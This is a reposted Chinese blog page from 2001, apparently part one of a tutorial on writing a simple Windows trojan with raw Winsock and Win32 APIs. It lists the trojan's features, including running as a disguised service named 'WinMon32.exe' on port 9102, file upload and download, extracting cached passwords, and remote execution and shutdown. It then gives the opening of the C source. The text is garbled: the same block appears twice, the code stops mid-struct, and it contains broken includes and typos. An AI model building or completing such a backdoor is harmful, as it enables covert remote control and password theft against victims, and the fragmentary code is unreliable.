一个简单木马列子(1) (转)[@more@]
一个简单木马列子(1)
[ 作者: 病毒 添加时间: 2001-5-21 下午 06:12:02 ]
来源:绿色兵团
俺写文章一般都赋 源代码.除关键部分外向来不爱打太多说明性文字,因为觉得这样
才比较实际,关于那些 函数用法和功能大可以去翻书,哪里讲的比谁都详细.
这里给了一个俺用异步SOCKET方式, 直接 调用WINSOCK api,WIN SDK写的木马(VC,C++ BUILDER下均编译, 调试通过),无须客户端,编译后才几十K.实现了些 主要功能, 文件浏览, 上传, 下载(均支持统配符),改变目录,获取 系统信息,从CACHE取密码, 执行文件,显示进程, 发送消息,关机, 还有些控制功能, WIN 9X,NT/2000下均 可使用,在NT,2000下,因考虑到如CMD.EXE已改名或不存在,那么 程序 将毫无用处. 所以 并没有调用CMD.EXE来完成,全部由自己来做,WIN API实现.要想自己程序通用就不要怕 麻烦.建议那些用现成 控件写木马和 网络通讯的朋友应该看看,去熟悉这些根本所在, 尤其是在网络 通讯方面.如果你是个程序员 我想大可不必用我多说,在开发中俺还没见过哪家公司让 用现成类 (MFC,VCL)来做的.
此程序还不很健壮,写完后也没来的及 优化,主要是拿来让大家熟悉一下WINSOCK和WIN SDK 编程.
//---------------------------------------------------------------------------
// WINSOCK API,WIN SDK编程,无需客户端
//
// 作者: 贾佳
//---------------------------------------------------------------------------
#include < windows.h>
#include
#include
#pragma hdrstop
#include
#pragma argsused
#define RUN "WinMon32.exe"
//注册服务
#define SERVICE_PROC 1
//卸载服务
#define UNSERVICE_PROC 0
#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255
//缓冲区长度
#define dwBuffSize 2048
//命令行长度
#define dwComm 50
#define PORT 9102
#define WM_SOCKET WM_USER+1
#define PROMPT "LanLan:>"
D word dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szRea dbuff,Ob,TempBuff;
int addrlen;
//CACHE PASSWORD结构
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbRe source;
WORD cbPassword;
.NET/getc/data/200105/2118104901_1.htm">下一页 8
[ 作者: 病毒 添加时间: 2001-5-21 下午 06:12:02 ]
来源:绿色兵团
俺写文章一般都赋 源代码.除关键部分外向来不爱打太多说明性文字,因为觉得这样
才比较实际,关于那些 函数用法和功能大可以去翻书,哪里讲的比谁都详细.
这里给了一个俺用异步SOCKET方式, 直接 调用WINSOCK api,WIN SDK写的木马(VC,C++ BUILDER下均编译, 调试通过),无须客户端,编译后才几十K.实现了些 主要功能, 文件浏览, 上传, 下载(均支持统配符),改变目录,获取 系统信息,从CACHE取密码, 执行文件,显示进程, 发送消息,关机, 还有些控制功能, WIN 9X,NT/2000下均 可使用,在NT,2000下,因考虑到如CMD.EXE已改名或不存在,那么 程序 将毫无用处. 所以 并没有调用CMD.EXE来完成,全部由自己来做,WIN API实现.要想自己程序通用就不要怕 麻烦.建议那些用现成 控件写木马和 网络通讯的朋友应该看看,去熟悉这些根本所在, 尤其是在网络 通讯方面.如果你是个程序员 我想大可不必用我多说,在开发中俺还没见过哪家公司让 用现成类 (MFC,VCL)来做的.
此程序还不很健壮,写完后也没来的及 优化,主要是拿来让大家熟悉一下WINSOCK和WIN SDK 编程.
//---------------------------------------------------------------------------
// WINSOCK API,WIN SDK编程,无需客户端
//
// 作者: 贾佳
//---------------------------------------------------------------------------
#include < windows.h>
#include
#include
#pragma hdrstop
#include
#pragma argsused
#define RUN "WinMon32.exe"
//注册服务
#define SERVICE_PROC 1
//卸载服务
#define UNSERVICE_PROC 0
#define TH32CS_SNAPPROCESS 0x00000002
#define PROCESS_HANDLE_NAME 255
//缓冲区长度
#define dwBuffSize 2048
//命令行长度
#define dwComm 50
#define PORT 9102
#define WM_SOCKET WM_USER+1
#define PROMPT "LanLan:>"
D word dwVersion=MAKEWORD(1,1);
DWORD dwFlag=TRUE;
WSADATA wsaData;
SOCKET CreateSock,NewSock;
SOCKADDR_IN Sock_in,NewSock_in;
LPTSTR szRea dbuff,Ob,TempBuff;
int addrlen;
//CACHE PASSWORD结构
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;
WORD cbRe source;
WORD cbPassword;
.NET/getc/data/200105/2118104901_1.htm">下一页 8
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-989139/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/10752043/viewspace-989139/
扫一扫
821
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
